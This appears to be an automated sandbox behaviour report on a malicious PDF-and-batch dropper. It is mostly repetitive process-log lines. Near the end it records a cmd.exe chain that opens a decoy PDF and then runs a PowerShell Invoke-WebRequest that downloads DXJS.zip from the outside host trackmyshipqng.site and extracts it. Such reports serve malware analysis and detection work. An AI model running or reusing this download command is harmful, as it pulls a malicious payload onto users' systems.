Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 5676Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6155Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3480Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2092
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep count: 6155 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 3480 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4980Thread sleep time: -23980767295822402s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1760Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep count: 7477 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep count: 2092 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6064Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000007.00000002.2679393383.000001FB4B85A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2676836204.000001FB4622B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.2083598394.0000028A19A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\DTBZGIOOSO.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DesusertionPath 'C:\Users\user\Downloads' -Force }"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
